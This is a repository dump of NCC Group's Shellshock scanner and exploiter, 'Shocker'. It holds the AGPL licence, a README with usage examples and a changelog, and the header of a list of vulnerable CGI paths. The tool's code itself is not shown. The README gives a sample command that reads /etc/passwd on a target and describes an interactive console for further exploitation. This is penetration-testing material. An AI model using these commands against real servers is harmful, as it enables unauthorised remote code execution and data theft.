├── LICENSE
├── README.md
├── shocker-cgi_list
├── shocker-target_list
└── shocker.py
/LICENSE:
--------------------------------------------------------------------------------
1 | GNU AFFERO GENERAL PUBLIC LICENSE
2 | Version 3, 19 November 2007
3 |
4 | Copyright (C) 2007 Free Software Foundation, Inc.
5 | Everyone is permitted to copy and distribute verbatim copies
6 | of this license document, but changing it is not allowed.
7 |
8 | Preamble
9 |
10 | The GNU Affero General Public License is a free, copyleft license for
11 | software and other kinds of works, specifically designed to ensure
12 | cooperation with the community in the case of network server software.
13 |
14 | The licenses for most software and other practical works are designed
15 | to take away your freedom to share and change the works. By contrast,
16 | our General Public Licenses are intended to guarantee your freedom to
17 | share and change all versions of a program--to make sure it remains free
18 | software for all its users.
19 |
20 | When we speak of free software, we are referring to freedom, not
21 | price. Our General Public Licenses are designed to make sure that you
22 | have the freedom to distribute copies of free software (and charge for
23 | them if you wish), that you receive source code or can get it if you
24 | want it, that you can change the software or use pieces of it in new
25 | free programs, and that you know you can do these things.
26 |
27 | Developers that use our General Public Licenses protect your rights
28 | with two steps: (1) assert copyright on the software, and (2) offer
29 | you this License which gives you legal permission to copy, distribute
30 | and/or modify the software.
31 |
32 | A secondary benefit of defending all users' freedom is that
33 | improvements made in alternate versions of the program, if they
34 | receive widespread use, become available for other developers to
35 | incorporate. Many developers of free software are heartened and
36 | encouraged by the resulting cooperation. However, in the case of
37 | software used on network servers, this result may fail to come about.
38 | The GNU General Public License permits making a modified version and
39 | letting the public access it on a server without ever releasing its
40 | source code to the public.
41 |
42 | The GNU Affero General Public License is designed specifically to
43 | ensure that, in such cases, the modified source code becomes available
44 | to the community. It requires the operator of a network server to
45 | provide the source code of the modified version running there to the
46 | users of that server. Therefore, public use of a modified version, on
47 | a publicly accessible server, gives the public access to the source
48 | code of the modified version.
49 |
50 | An older license, called the Affero General Public License and
51 | published by Affero, was designed to accomplish similar goals. This is
52 | a different license, not a version of the Affero GPL, but Affero has
53 | released a new version of the Affero GPL which permits relicensing under
54 | this license.
55 |
56 | The precise terms and conditions for copying, distribution and
57 | modification follow.
58 |
59 | TERMS AND CONDITIONS
60 |
61 | 0. Definitions.
62 |
63 | "This License" refers to version 3 of the GNU Affero General Public License.
64 |
65 | "Copyright" also means copyright-like laws that apply to other kinds of
66 | works, such as semiconductor masks.
67 |
68 | "The Program" refers to any copyrightable work licensed under this
69 | License. Each licensee is addressed as "you". "Licensees" and
70 | "recipients" may be individuals or organizations.
71 |
72 | To "modify" a work means to copy from or adapt all or part of the work
73 | in a fashion requiring copyright permission, other than the making of an
74 | exact copy. The resulting work is called a "modified version" of the
75 | earlier work or a work "based on" the earlier work.
76 |
77 | A "covered work" means either the unmodified Program or a work based
78 | on the Program.
79 |
80 | To "propagate" a work means to do anything with it that, without
81 | permission, would make you directly or secondarily liable for
82 | infringement under applicable copyright law, except executing it on a
83 | computer or modifying a private copy. Propagation includes copying,
84 | distribution (with or without modification), making available to the
85 | public, and in some countries other activities as well.
86 |
87 | To "convey" a work means any kind of propagation that enables other
88 | parties to make or receive copies. Mere interaction with a user through
89 | a computer network, with no transfer of a copy, is not conveying.
90 |
91 | An interactive user interface displays "Appropriate Legal Notices"
92 | to the extent that it includes a convenient and prominently visible
93 | feature that (1) displays an appropriate copyright notice, and (2)
94 | tells the user that there is no warranty for the work (except to the
95 | extent that warranties are provided), that licensees may convey the
96 | work under this License, and how to view a copy of this License. If
97 | the interface presents a list of user commands or options, such as a
98 | menu, a prominent item in the list meets this criterion.
99 |
100 | 1. Source Code.
101 |
102 | The "source code" for a work means the preferred form of the work
103 | for making modifications to it. "Object code" means any non-source
104 | form of a work.
105 |
106 | A "Standard Interface" means an interface that either is an official
107 | standard defined by a recognized standards body, or, in the case of
108 | interfaces specified for a particular programming language, one that
109 | is widely used among developers working in that language.
110 |
111 | The "System Libraries" of an executable work include anything, other
112 | than the work as a whole, that (a) is included in the normal form of
113 | packaging a Major Component, but which is not part of that Major
114 | Component, and (b) serves only to enable use of the work with that
115 | Major Component, or to implement a Standard Interface for which an
116 | implementation is available to the public in source code form. A
117 | "Major Component", in this context, means a major essential component
118 | (kernel, window system, and so on) of the specific operating system
119 | (if any) on which the executable work runs, or a compiler used to
120 | produce the work, or an object code interpreter used to run it.
121 |
122 | The "Corresponding Source" for a work in object code form means all
123 | the source code needed to generate, install, and (for an executable
124 | work) run the object code and to modify the work, including scripts to
125 | control those activities. However, it does not include the work's
126 | System Libraries, or general-purpose tools or generally available free
127 | programs which are used unmodified in performing those activities but
128 | which are not part of the work. For example, Corresponding Source
129 | includes interface definition files associated with source files for
130 | the work, and the source code for shared libraries and dynamically
131 | linked subprograms that the work is specifically designed to require,
132 | such as by intimate data communication or control flow between those
133 | subprograms and other parts of the work.
134 |
135 | The Corresponding Source need not include anything that users
136 | can regenerate automatically from other parts of the Corresponding
137 | Source.
138 |
139 | The Corresponding Source for a work in source code form is that
140 | same work.
141 |
142 | 2. Basic Permissions.
143 |
144 | All rights granted under this License are granted for the term of
145 | copyright on the Program, and are irrevocable provided the stated
146 | conditions are met. This License explicitly affirms your unlimited
147 | permission to run the unmodified Program. The output from running a
148 | covered work is covered by this License only if the output, given its
149 | content, constitutes a covered work. This License acknowledges your
150 | rights of fair use or other equivalent, as provided by copyright law.
151 |
152 | You may make, run and propagate covered works that you do not
153 | convey, without conditions so long as your license otherwise remains
154 | in force. You may convey covered works to others for the sole purpose
155 | of having them make modifications exclusively for you, or provide you
156 | with facilities for running those works, provided that you comply with
157 | the terms of this License in conveying all material for which you do
158 | not control copyright. Those thus making or running the covered works
159 | for you must do so exclusively on your behalf, under your direction
160 | and control, on terms that prohibit them from making any copies of
161 | your copyrighted material outside their relationship with you.
162 |
163 | Conveying under any other circumstances is permitted solely under
164 | the conditions stated below. Sublicensing is not allowed; section 10
165 | makes it unnecessary.
166 |
167 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law.
168 |
169 | No covered work shall be deemed part of an effective technological
170 | measure under any applicable law fulfilling obligations under article
171 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or
172 | similar laws prohibiting or restricting circumvention of such
173 | measures.
174 |
175 | When you convey a covered work, you waive any legal power to forbid
176 | circumvention of technological measures to the extent such circumvention
177 | is effected by exercising rights under this License with respect to
178 | the covered work, and you disclaim any intention to limit operation or
179 | modification of the work as a means of enforcing, against the work's
180 | users, your or third parties' legal rights to forbid circumvention of
181 | technological measures.
182 |
183 | 4. Conveying Verbatim Copies.
184 |
185 | You may convey verbatim copies of the Program's source code as you
186 | receive it, in any medium, provided that you conspicuously and
187 | appropriately publish on each copy an appropriate copyright notice;
188 | keep intact all notices stating that this License and any
189 | non-permissive terms added in accord with section 7 apply to the code;
190 | keep intact all notices of the absence of any warranty; and give all
191 | recipients a copy of this License along with the Program.
192 |
193 | You may charge any price or no price for each copy that you convey,
194 | and you may offer support or warranty protection for a fee.
195 |
196 | 5. Conveying Modified Source Versions.
197 |
198 | You may convey a work based on the Program, or the modifications to
199 | produce it from the Program, in the form of source code under the
200 | terms of section 4, provided that you also meet all of these conditions:
201 |
202 | a) The work must carry prominent notices stating that you modified
203 | it, and giving a relevant date.
204 |
205 | b) The work must carry prominent notices stating that it is
206 | released under this License and any conditions added under section
207 | 7. This requirement modifies the requirement in section 4 to
208 | "keep intact all notices".
209 |
210 | c) You must license the entire work, as a whole, under this
211 | License to anyone who comes into possession of a copy. This
212 | License will therefore apply, along with any applicable section 7
213 | additional terms, to the whole of the work, and all its parts,
214 | regardless of how they are packaged. This License gives no
215 | permission to license the work in any other way, but it does not
216 | invalidate such permission if you have separately received it.
217 |
218 | d) If the work has interactive user interfaces, each must display
219 | Appropriate Legal Notices; however, if the Program has interactive
220 | interfaces that do not display Appropriate Legal Notices, your
221 | work need not make them do so.
222 |
223 | A compilation of a covered work with other separate and independent
224 | works, which are not by their nature extensions of the covered work,
225 | and which are not combined with it such as to form a larger program,
226 | in or on a volume of a storage or distribution medium, is called an
227 | "aggregate" if the compilation and its resulting copyright are not
228 | used to limit the access or legal rights of the compilation's users
229 | beyond what the individual works permit. Inclusion of a covered work
230 | in an aggregate does not cause this License to apply to the other
231 | parts of the aggregate.
232 |
233 | 6. Conveying Non-Source Forms.
234 |
235 | You may convey a covered work in object code form under the terms
236 | of sections 4 and 5, provided that you also convey the
237 | machine-readable Corresponding Source under the terms of this License,
238 | in one of these ways:
239 |
240 | a) Convey the object code in, or embodied in, a physical product
241 | (including a physical distribution medium), accompanied by the
242 | Corresponding Source fixed on a durable physical medium
243 | customarily used for software interchange.
244 |
245 | b) Convey the object code in, or embodied in, a physical product
246 | (including a physical distribution medium), accompanied by a
247 | written offer, valid for at least three years and valid for as
248 | long as you offer spare parts or customer support for that product
249 | model, to give anyone who possesses the object code either (1) a
250 | copy of the Corresponding Source for all the software in the
251 | product that is covered by this License, on a durable physical
252 | medium customarily used for software interchange, for a price no
253 | more than your reasonable cost of physically performing this
254 | conveying of source, or (2) access to copy the
255 | Corresponding Source from a network server at no charge.
256 |
257 | c) Convey individual copies of the object code with a copy of the
258 | written offer to provide the Corresponding Source. This
259 | alternative is allowed only occasionally and noncommercially, and
260 | only if you received the object code with such an offer, in accord
261 | with subsection 6b.
262 |
263 | d) Convey the object code by offering access from a designated
264 | place (gratis or for a charge), and offer equivalent access to the
265 | Corresponding Source in the same way through the same place at no
266 | further charge. You need not require recipients to copy the
267 | Corresponding Source along with the object code. If the place to
268 | copy the object code is a network server, the Corresponding Source
269 | may be on a different server (operated by you or a third party)
270 | that supports equivalent copying facilities, provided you maintain
271 | clear directions next to the object code saying where to find the
272 | Corresponding Source. Regardless of what server hosts the
273 | Corresponding Source, you remain obligated to ensure that it is
274 | available for as long as needed to satisfy these requirements.
275 |
276 | e) Convey the object code using peer-to-peer transmission, provided
277 | you inform other peers where the object code and Corresponding
278 | Source of the work are being offered to the general public at no
279 | charge under subsection 6d.
280 |
281 | A separable portion of the object code, whose source code is excluded
282 | from the Corresponding Source as a System Library, need not be
283 | included in conveying the object code work.
284 |
285 | A "User Product" is either (1) a "consumer product", which means any
286 | tangible personal property which is normally used for personal, family,
287 | or household purposes, or (2) anything designed or sold for incorporation
288 | into a dwelling. In determining whether a product is a consumer product,
289 | doubtful cases shall be resolved in favor of coverage. For a particular
290 | product received by a particular user, "normally used" refers to a
291 | typical or common use of that class of product, regardless of the status
292 | of the particular user or of the way in which the particular user
293 | actually uses, or expects or is expected to use, the product. A product
294 | is a consumer product regardless of whether the product has substantial
295 | commercial, industrial or non-consumer uses, unless such uses represent
296 | the only significant mode of use of the product.
297 |
298 | "Installation Information" for a User Product means any methods,
299 | procedures, authorization keys, or other information required to install
300 | and execute modified versions of a covered work in that User Product from
301 | a modified version of its Corresponding Source. The information must
302 | suffice to ensure that the continued functioning of the modified object
303 | code is in no case prevented or interfered with solely because
304 | modification has been made.
305 |
306 | If you convey an object code work under this section in, or with, or
307 | specifically for use in, a User Product, and the conveying occurs as
308 | part of a transaction in which the right of possession and use of the
309 | User Product is transferred to the recipient in perpetuity or for a
310 | fixed term (regardless of how the transaction is characterized), the
311 | Corresponding Source conveyed under this section must be accompanied
312 | by the Installation Information. But this requirement does not apply
313 | if neither you nor any third party retains the ability to install
314 | modified object code on the User Product (for example, the work has
315 | been installed in ROM).
316 |
317 | The requirement to provide Installation Information does not include a
318 | requirement to continue to provide support service, warranty, or updates
319 | for a work that has been modified or installed by the recipient, or for
320 | the User Product in which it has been modified or installed. Access to a
321 | network may be denied when the modification itself materially and
322 | adversely affects the operation of the network or violates the rules and
323 | protocols for communication across the network.
324 |
325 | Corresponding Source conveyed, and Installation Information provided,
326 | in accord with this section must be in a format that is publicly
327 | documented (and with an implementation available to the public in
328 | source code form), and must require no special password or key for
329 | unpacking, reading or copying.
330 |
331 | 7. Additional Terms.
332 |
333 | "Additional permissions" are terms that supplement the terms of this
334 | License by making exceptions from one or more of its conditions.
335 | Additional permissions that are applicable to the entire Program shall
336 | be treated as though they were included in this License, to the extent
337 | that they are valid under applicable law. If additional permissions
338 | apply only to part of the Program, that part may be used separately
339 | under those permissions, but the entire Program remains governed by
340 | this License without regard to the additional permissions.
341 |
342 | When you convey a copy of a covered work, you may at your option
343 | remove any additional permissions from that copy, or from any part of
344 | it. (Additional permissions may be written to require their own
345 | removal in certain cases when you modify the work.) You may place
346 | additional permissions on material, added by you to a covered work,
347 | for which you have or can give appropriate copyright permission.
348 |
349 | Notwithstanding any other provision of this License, for material you
350 | add to a covered work, you may (if authorized by the copyright holders of
351 | that material) supplement the terms of this License with terms:
352 |
353 | a) Disclaiming warranty or limiting liability differently from the
354 | terms of sections 15 and 16 of this License; or
355 |
356 | b) Requiring preservation of specified reasonable legal notices or
357 | author attributions in that material or in the Appropriate Legal
358 | Notices displayed by works containing it; or
359 |
360 | c) Prohibiting misrepresentation of the origin of that material, or
361 | requiring that modified versions of such material be marked in
362 | reasonable ways as different from the original version; or
363 |
364 | d) Limiting the use for publicity purposes of names of licensors or
365 | authors of the material; or
366 |
367 | e) Declining to grant rights under trademark law for use of some
368 | trade names, trademarks, or service marks; or
369 |
370 | f) Requiring indemnification of licensors and authors of that
371 | material by anyone who conveys the material (or modified versions of
372 | it) with contractual assumptions of liability to the recipient, for
373 | any liability that these contractual assumptions directly impose on
374 | those licensors and authors.
375 |
376 | All other non-permissive additional terms are considered "further
377 | restrictions" within the meaning of section 10. If the Program as you
378 | received it, or any part of it, contains a notice stating that it is
379 | governed by this License along with a term that is a further
380 | restriction, you may remove that term. If a license document contains
381 | a further restriction but permits relicensing or conveying under this
382 | License, you may add to a covered work material governed by the terms
383 | of that license document, provided that the further restriction does
384 | not survive such relicensing or conveying.
385 |
386 | If you add terms to a covered work in accord with this section, you
387 | must place, in the relevant source files, a statement of the
388 | additional terms that apply to those files, or a notice indicating
389 | where to find the applicable terms.
390 |
391 | Additional terms, permissive or non-permissive, may be stated in the
392 | form of a separately written license, or stated as exceptions;
393 | the above requirements apply either way.
394 |
395 | 8. Termination.
396 |
397 | You may not propagate or modify a covered work except as expressly
398 | provided under this License. Any attempt otherwise to propagate or
399 | modify it is void, and will automatically terminate your rights under
400 | this License (including any patent licenses granted under the third
401 | paragraph of section 11).
402 |
403 | However, if you cease all violation of this License, then your
404 | license from a particular copyright holder is reinstated (a)
405 | provisionally, unless and until the copyright holder explicitly and
406 | finally terminates your license, and (b) permanently, if the copyright
407 | holder fails to notify you of the violation by some reasonable means
408 | prior to 60 days after the cessation.
409 |
410 | Moreover, your license from a particular copyright holder is
411 | reinstated permanently if the copyright holder notifies you of the
412 | violation by some reasonable means, this is the first time you have
413 | received notice of violation of this License (for any work) from that
414 | copyright holder, and you cure the violation prior to 30 days after
415 | your receipt of the notice.
416 |
417 | Termination of your rights under this section does not terminate the
418 | licenses of parties who have received copies or rights from you under
419 | this License. If your rights have been terminated and not permanently
420 | reinstated, you do not qualify to receive new licenses for the same
421 | material under section 10.
422 |
423 | 9. Acceptance Not Required for Having Copies.
424 |
425 | You are not required to accept this License in order to receive or
426 | run a copy of the Program. Ancillary propagation of a covered work
427 | occurring solely as a consequence of using peer-to-peer transmission
428 | to receive a copy likewise does not require acceptance. However,
429 | nothing other than this License grants you permission to propagate or
430 | modify any covered work. These actions infringe copyright if you do
431 | not accept this License. Therefore, by modifying or propagating a
432 | covered work, you indicate your acceptance of this License to do so.
433 |
434 | 10. Automatic Licensing of Downstream Recipients.
435 |
436 | Each time you convey a covered work, the recipient automatically
437 | receives a license from the original licensors, to run, modify and
438 | propagate that work, subject to this License. You are not responsible
439 | for enforcing compliance by third parties with this License.
440 |
441 | An "entity transaction" is a transaction transferring control of an
442 | organization, or substantially all assets of one, or subdividing an
443 | organization, or merging organizations. If propagation of a covered
444 | work results from an entity transaction, each party to that
445 | transaction who receives a copy of the work also receives whatever
446 | licenses to the work the party's predecessor in interest had or could
447 | give under the previous paragraph, plus a right to possession of the
448 | Corresponding Source of the work from the predecessor in interest, if
449 | the predecessor has it or can get it with reasonable efforts.
450 |
451 | You may not impose any further restrictions on the exercise of the
452 | rights granted or affirmed under this License. For example, you may
453 | not impose a license fee, royalty, or other charge for exercise of
454 | rights granted under this License, and you may not initiate litigation
455 | (including a cross-claim or counterclaim in a lawsuit) alleging that
456 | any patent claim is infringed by making, using, selling, offering for
457 | sale, or importing the Program or any portion of it.
458 |
459 | 11. Patents.
460 |
461 | A "contributor" is a copyright holder who authorizes use under this
462 | License of the Program or a work on which the Program is based. The
463 | work thus licensed is called the contributor's "contributor version".
464 |
465 | A contributor's "essential patent claims" are all patent claims
466 | owned or controlled by the contributor, whether already acquired or
467 | hereafter acquired, that would be infringed by some manner, permitted
468 | by this License, of making, using, or selling its contributor version,
469 | but do not include claims that would be infringed only as a
470 | consequence of further modification of the contributor version. For
471 | purposes of this definition, "control" includes the right to grant
472 | patent sublicenses in a manner consistent with the requirements of
473 | this License.
474 |
475 | Each contributor grants you a non-exclusive, worldwide, royalty-free
476 | patent license under the contributor's essential patent claims, to
477 | make, use, sell, offer for sale, import and otherwise run, modify and
478 | propagate the contents of its contributor version.
479 |
480 | In the following three paragraphs, a "patent license" is any express
481 | agreement or commitment, however denominated, not to enforce a patent
482 | (such as an express permission to practice a patent or covenant not to
483 | sue for patent infringement). To "grant" such a patent license to a
484 | party means to make such an agreement or commitment not to enforce a
485 | patent against the party.
486 |
487 | If you convey a covered work, knowingly relying on a patent license,
488 | and the Corresponding Source of the work is not available for anyone
489 | to copy, free of charge and under the terms of this License, through a
490 | publicly available network server or other readily accessible means,
491 | then you must either (1) cause the Corresponding Source to be so
492 | available, or (2) arrange to deprive yourself of the benefit of the
493 | patent license for this particular work, or (3) arrange, in a manner
494 | consistent with the requirements of this License, to extend the patent
495 | license to downstream recipients. "Knowingly relying" means you have
496 | actual knowledge that, but for the patent license, your conveying the
497 | covered work in a country, or your recipient's use of the covered work
498 | in a country, would infringe one or more identifiable patents in that
499 | country that you have reason to believe are valid.
500 |
501 | If, pursuant to or in connection with a single transaction or
502 | arrangement, you convey, or propagate by procuring conveyance of, a
503 | covered work, and grant a patent license to some of the parties
504 | receiving the covered work authorizing them to use, propagate, modify
505 | or convey a specific copy of the covered work, then the patent license
506 | you grant is automatically extended to all recipients of the covered
507 | work and works based on it.
508 |
509 | A patent license is "discriminatory" if it does not include within
510 | the scope of its coverage, prohibits the exercise of, or is
511 | conditioned on the non-exercise of one or more of the rights that are
512 | specifically granted under this License. You may not convey a covered
513 | work if you are a party to an arrangement with a third party that is
514 | in the business of distributing software, under which you make payment
515 | to the third party based on the extent of your activity of conveying
516 | the work, and under which the third party grants, to any of the
517 | parties who would receive the covered work from you, a discriminatory
518 | patent license (a) in connection with copies of the covered work
519 | conveyed by you (or copies made from those copies), or (b) primarily
520 | for and in connection with specific products or compilations that
521 | contain the covered work, unless you entered into that arrangement,
522 | or that patent license was granted, prior to 28 March 2007.
523 |
524 | Nothing in this License shall be construed as excluding or limiting
525 | any implied license or other defenses to infringement that may
526 | otherwise be available to you under applicable patent law.
527 |
528 | 12. No Surrender of Others' Freedom.
529 |
530 | If conditions are imposed on you (whether by court order, agreement or
531 | otherwise) that contradict the conditions of this License, they do not
532 | excuse you from the conditions of this License. If you cannot convey a
533 | covered work so as to satisfy simultaneously your obligations under this
534 | License and any other pertinent obligations, then as a consequence you may
535 | not convey it at all. For example, if you agree to terms that obligate you
536 | to collect a royalty for further conveying from those to whom you convey
537 | the Program, the only way you could satisfy both those terms and this
538 | License would be to refrain entirely from conveying the Program.
539 |
540 | 13. Remote Network Interaction; Use with the GNU General Public License.
541 |
542 | Notwithstanding any other provision of this License, if you modify the
543 | Program, your modified version must prominently offer all users
544 | interacting with it remotely through a computer network (if your version
545 | supports such interaction) an opportunity to receive the Corresponding
546 | Source of your version by providing access to the Corresponding Source
547 | from a network server at no charge, through some standard or customary
548 | means of facilitating copying of software. This Corresponding Source
549 | shall include the Corresponding Source for any work covered by version 3
550 | of the GNU General Public License that is incorporated pursuant to the
551 | following paragraph.
552 |
553 | Notwithstanding any other provision of this License, you have
554 | permission to link or combine any covered work with a work licensed
555 | under version 3 of the GNU General Public License into a single
556 | combined work, and to convey the resulting work. The terms of this
557 | License will continue to apply to the part which is the covered work,
558 | but the work with which it is combined will remain governed by version
559 | 3 of the GNU General Public License.
560 |
561 | 14. Revised Versions of this License.
562 |
563 | The Free Software Foundation may publish revised and/or new versions of
564 | the GNU Affero General Public License from time to time. Such new versions
565 | will be similar in spirit to the present version, but may differ in detail to
566 | address new problems or concerns.
567 |
568 | Each version is given a distinguishing version number. If the
569 | Program specifies that a certain numbered version of the GNU Affero General
570 | Public License "or any later version" applies to it, you have the
571 | option of following the terms and conditions either of that numbered
572 | version or of any later version published by the Free Software
573 | Foundation. If the Program does not specify a version number of the
574 | GNU Affero General Public License, you may choose any version ever published
575 | by the Free Software Foundation.
576 |
577 | If the Program specifies that a proxy can decide which future
578 | versions of the GNU Affero General Public License can be used, that proxy's
579 | public statement of acceptance of a version permanently authorizes you
580 | to choose that version for the Program.
581 |
582 | Later license versions may give you additional or different
583 | permissions. However, no additional obligations are imposed on any
584 | author or copyright holder as a result of your choosing to follow a
585 | later version.
586 |
587 | 15. Disclaimer of Warranty.
588 |
589 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
590 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
591 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
592 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
593 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
594 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
595 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
596 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
597 |
598 | 16. Limitation of Liability.
599 |
600 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
601 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
602 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
603 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
604 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
605 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
606 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
607 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
608 | SUCH DAMAGES.
609 |
610 | 17. Interpretation of Sections 15 and 16.
611 |
612 | If the disclaimer of warranty and limitation of liability provided
613 | above cannot be given local legal effect according to their terms,
614 | reviewing courts shall apply local law that most closely approximates
615 | an absolute waiver of all civil liability in connection with the
616 | Program, unless a warranty or assumption of liability accompanies a
617 | copy of the Program in return for a fee.
618 |
619 | END OF TERMS AND CONDITIONS
620 |
621 | How to Apply These Terms to Your New Programs
622 |
623 | If you develop a new program, and you want it to be of the greatest
624 | possible use to the public, the best way to achieve this is to make it
625 | free software which everyone can redistribute and change under these terms.
626 |
627 | To do so, attach the following notices to the program. It is safest
628 | to attach them to the start of each source file to most effectively
629 | state the exclusion of warranty; and each file should have at least
630 | the "copyright" line and a pointer to where the full notice is found.
631 |
632 |
633 | Copyright (C)
634 |
635 | This program is free software: you can redistribute it and/or modify
636 | it under the terms of the GNU Affero General Public License as published by
637 | the Free Software Foundation, either version 3 of the License, or
638 | (at your option) any later version.
639 |
640 | This program is distributed in the hope that it will be useful,
641 | but WITHOUT ANY WARRANTY; without even the implied warranty of
642 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
643 | GNU Affero General Public License for more details.
644 |
645 | You should have received a copy of the GNU Affero General Public License
646 | along with this program. If not, see .
647 |
648 | Also add information on how to contact you by electronic and paper mail.
649 |
650 | If your software can interact with users remotely through a computer
651 | network, you should also make sure that it provides a way for users to
652 | get its source. For example, if your program is a web application, its
653 | interface could display a "Source" link that leads users to an archive
654 | of the code. There are many ways you could offer source, and different
655 | solutions will be better for different programs; see section 13 for the
656 | specific requirements.
657 |
658 | You should also get your employer (if you work as a programmer) or school,
659 | if any, to sign a "copyright disclaimer" for the program, if necessary.
660 | For more information on this, and how to apply and follow the GNU AGPL, see
661 | .
662 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | Shocker
2 | ======================
3 | A tool to find and exploit servers vulnerable to Shellshock
4 |
5 | Ref: https://en.wikipedia.org/wiki/Shellshock_(software_bug)
6 |
7 | Released as open source by NCC Group Plc - https://www.nccgroup.trust/
8 |
9 | Developed By:
10 | * Tom Watson, tom [dot] watson [at] nccgroup [dot] trust
11 |
12 | https://github.com/nccgroup/shocker
13 |
14 | Released under AGPL see LICENSE for more information
15 |
16 | Help Text
17 | -------------
18 | usage:
19 | shocker.py
20 |
21 | -h, --help show this help message and exit
22 |
23 | --Host HOST, -H HOST
24 | A target hostname or IP address
25 |
26 | --file FILE, -f FILE File containing a list of targets
27 |
28 | --port PORT, -p PORT The target port number (default=80)
29 |
30 | --command COMMAND Command to execute (default=/bin/uname -a)
31 |
32 | --cgi CGI, -c CGI Single CGI to check (e.g. /cgi-bin/test.cgi)
33 |
34 | --proxy PROXY *A BIT BROKEN RIGHT NOW* Proxy to be used in the form
35 | 'ip:port'
36 |
37 | --ssl, -s Use SSL (default=False)
38 |
39 | --threads THREADS, -t THREADS
40 | Maximum number of threads (default=10, max=100)
41 |
42 | --verbose, -v Be verbose in output
43 |
44 | Usage Examples
45 | -------------
46 | `./shocker.py -H 127.0.0.1 --command "/bin/cat /etc/passwd" -c /cgi-bin/test.cgi`
47 |
48 | Scans for http://127.0.0.1/cgi-bin/test.cgi and, if found, attempts to cat
49 | /etc/passwd
50 |
51 | `./shocker.py -H www.example.com -p 8001 -s`
52 |
53 | Scan www.example.com on port 8001 using SSL for all scripts in cgi_list and
54 | attempts the default exploit for any found
55 |
56 | `./shocker.py -f ./hostlist`
57 |
58 | Scans all hosts listed in the file ./hostlist with the default options
59 |
60 | Dependencies
61 | -------------
62 | Python 2.7+
63 |
64 | Change Log
65 | -------------
66 | Changes in version 1.1 (June 2018)
67 |
68 | * Added some additinoal debugging functionality and corrected help text
69 |
70 | Changes in version 1.0 (March 2016)
71 |
72 | * Some additional scripts contributed and updates to some comments, URLs and contact details
73 |
74 | Changes in version 0.72 (December 2014)
75 |
76 | * Minor corrections to logic and typos
77 |
78 | Changes in version 0.71 (December 2014)
79 |
80 | * Added timeout to urllib2.urlopen requests using a global 'TIMEOUT'
81 |
82 | Changes in version 0.7 (November 2014)
83 |
84 | * Add interactive 'psuedo console' for further exploitation of a chosen vulnerable server
85 | * Attemped to clean up output buffering issues by wrapping sys.stdout in a class which flushes on every call to write
86 | * Added a progress indicator for use in time consuming tasks to reassure non vebose users
87 |
88 | Changes in version 0.6 (October 2014)
89 |
90 | * Preventing return codes other than 200 from being considered successes
91 | * Added ability to specify multiple targets in a file
92 | * Moved the 'cgi_list' list of scripts to attempt to exploit to a file
93 | * Fixed some output formatting issues
94 | * Fixed valid hostname/IP regex to allow single word hostnames
95 |
96 | Changes in version 0.5 (October 2014)
97 |
98 | * Added ability to specify a single script to target rather than using cgi_list
99 | * Introduced a timeout on socket operations for host_check
100 | * Added some usage examples in the script header
101 | * Added an epilogue to the help text indicating presence of examples
102 |
103 | Changes in version 0.4 (October 2014)
104 |
105 | * Introduced a thread count limit defaulting to 10
106 | * Removed colour support until I can figure out how to make it work in Windows and *nix equally well
107 | * Spelling corrections
108 | * More comprehensive cgi_list
109 | * Removes success_flag from output
110 |
111 | Pre 0.4 (October 2014)
112 |
113 | * No idea
114 |
115 | TODO
116 | -------------
117 | * Identify and respond correctly to HTTP/200 response - false positives - Low priority/hassle
118 | * Implement curses for *nix systems - For the whole application or only psuedo terminal? - Low priority/prettiness
119 | * Thread the initial host check now that multiple targets are supported (and could be make this bit time consuming)
120 | * Change verbose to integer value - quiet, normal, verbose, debug?
121 | * Add option to skip initial host checks for the sake of speed?
122 | * Add a summary of results before exiting
123 | * Save results to a file? Format?
124 | * Eventually the idea is to include multiple possible vectors but currently only one is checked.
125 | * Add Windows and *nix colour support - Low priority/prettiness
126 | * Add a timeout in interactive mode for commands which don't return, e.g. /bin/cat /dev/zero
127 | * Prettify - Low priority/pretinness (obviously)
128 | * Add support for scanning and explointing SSH and SMTP? https://isc.sans.edu/diary/Shellshock+via+SMTP/18879
129 | * Add SOCKS proxy support, potentially using https://github.com/rpicard/socksonsocks/ from Rober Picard
130 | * Other stuff. Probably.
131 |
132 | Thanks to...
133 | -------------
134 | Anthony Caulfield @ NCC for time and effort reviewing early versions
135 |
136 | Brendan Coles @ NCC for his support and contributions
137 |
--------------------------------------------------------------------------------
/shocker-cgi_list:
--------------------------------------------------------------------------------
1 | # Resource file for shocker.py
2 | # List of pages/scripts potentially vulnerable to Shellshock
3 | # One per line, no commas, spaces, tabs, etc.
4 | # Credits to the following from whence many were borrowed:
5 | # https://github.com/mubix/shellshocker-pocs/blob/master/shell_sprayer.py
6 | # http://patrickpierson.us/wp-content/uploads/2014/09/shellshock.txt
